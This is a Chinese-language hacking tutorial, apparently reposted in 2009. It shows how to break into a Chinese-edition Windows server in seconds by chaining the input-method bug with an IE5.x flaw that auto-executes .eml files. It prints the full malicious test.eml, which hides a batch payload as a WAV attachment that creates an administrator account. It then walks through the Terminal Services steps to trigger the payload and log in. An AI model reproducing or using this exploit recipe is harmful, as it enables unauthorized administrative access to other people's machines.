通过两个漏洞10秒钟进入对方的服务器

间隙填充
正睿科技  发布时间:2009-09-14 09:31:51  浏览数:1222

  通过两个漏洞的结合只需要不到10秒钟的时间就能进入对方的服务器只要具有以下两个漏洞的机器都能被快速入侵:

  1.输入法漏洞

  2.以eml为扩展名的Internet E-Mail Message文件可以执行本地命令的 ie5.x漏洞

  当然了上面的第一个漏洞只针对与中文服务器版,而第二个漏洞针对与所有的ie5.x浏览器

  下面我们来做个实验。

  实验步骤:

  我们现在来讲一下实际的操作步骤

  1.准备

  先准备一个eml文件(eml文件为邮件文件,是用outlook编辑并且保存的)。

  具体代码如下:

  这个是test.eml文件的源代码:

  ==================================================================

  : "xxxxx" /*发信人*/

  Subject: mail /*主题为mail*/

  Date: Thu, 2 Nov 2000 13:27:33 +0100 /*发信日期*/

  MIME-Version: 1.0 /*MIME-多用途的网际邮件扩充协议的版本*/

  Content-Type: multipart/related; /*内容类型*/

  type="multipart/alternative";

  boundary="1" /*分界线*/

  X-Priority: 3 /*优先权*/

  X-MSMail-Priority: Normal /*优先权*/

  X-Unsent: 1 /*未发出*/

  --1

  Content-Type: multipart/alternative; /*内容类型*/

  boundary="2" /*分界线*/

  --2

  Content-Type: text/html;/*内容类型*/

  set="iso-8859-1" /*标准序号*/

  Content-Transfer-Encoding: quoted-printable /*内容传送编码类型 */

  /*---------------下面一部分是传送的邮件显示的页面源代码---------- -----*/

  我可以执行控制台命令

  /*---------------结束---------------*/

  --2--

  --1

  Content-Type: audio/x-wav; /*内容类型*/

  name="h*llo.bat" /*文件名*/

  Content-Transfer-Encoding: quoted-printable /*内容传送编码类型 */

  Content-ID:

  /*---------------这一部分是主要部分,主要是用来创建一个test的管员

  账号---------------*/

  echo OFF

  net user test 12345678 /add

  net localgroup administrators test /add

  pause

  --1

  =============================================================

  把上面的源代码复制到一个文件,文件扩展名必须为eml(去掉我自己写的那一部分注释),比如说我们把这个文件命名为test.eml,然后放在互联网上,比如说test.eml的url为,http://xxx.xxx.xxx.xxx/test.eml,然后开始我们的第二步骤

  2.连接

  我们用终端服务客户端连入终端服务服务端。

  3.入侵

  连入以后,切换输入法,然后再输入法的状态条上面单击右键然后选择帮助文件,最后在帮助文件的标题栏上面单击右键,选择跳转url. 然后输入http://xxx.xxx.xxx.xxx/test.eml,这个时候这个test的管理员账号已经生效。 然后我们用username:test password:12345678 登入。 这个时候我们会看到一个黑色的控制台上面的文字是:

  C:\Documents Settings\Administrator\My Documents>echo OFF

  命令成功完成。

  命令成功完成。

  请按任意键继续 . . .

  这个就是我们刚才用的那个test.eml执行本地命令的结果。

  好了。其实入侵一个这样的服务器就是那么简单。

  根据自己的网速而定,如果网速很快的话,我想我们浪费时间只是在点右键和输入http://xxx.xxx.xxx.xxx/test.eml上面。这样来看10秒钟入侵成为了可能。

  现在我来分析一下原理

  1.输入法漏洞我们就不多说了,关于这方面的文章很多。我们主要来介绍一下eml文件。

  对于我这样一个不经常用office或者是outlook的人来说。其实我也是不太了解。 下面的是关于eml文件的说明

  图标位置:C:\Program Files\Outlook Express\msimn.exe

  操作open

  用于执行操作的应用程序

  "C:\Program Files\Outlook Express\msimn.exe" /eml:%1

  类型说明:Internet E-Mail Message

  上面的那个部分代码我已经大致的把我所知道的都介绍了

  关于ie5.x的这个eml漏洞主要是因为这个文件下载以后立即执行。而没有提示框。

  这个test.eml的原理是在打开这个eml文件的时候,会立即在浏览该文件的计算机 的c:\Documents Settings\Administrator\Local

  Settings\temp录下面建立

  一个h*llo.bat文件,其内容是

  echo OFF

  net user test 12345678 /add

  net localgroup administrators test /add

  pause

  并且立即执行这个文件。 这样我们就创建了一个test的管理员账号。 也就是说我们不仅能登陆到远程计算机上面,而且我们具有管理员权限。 (完)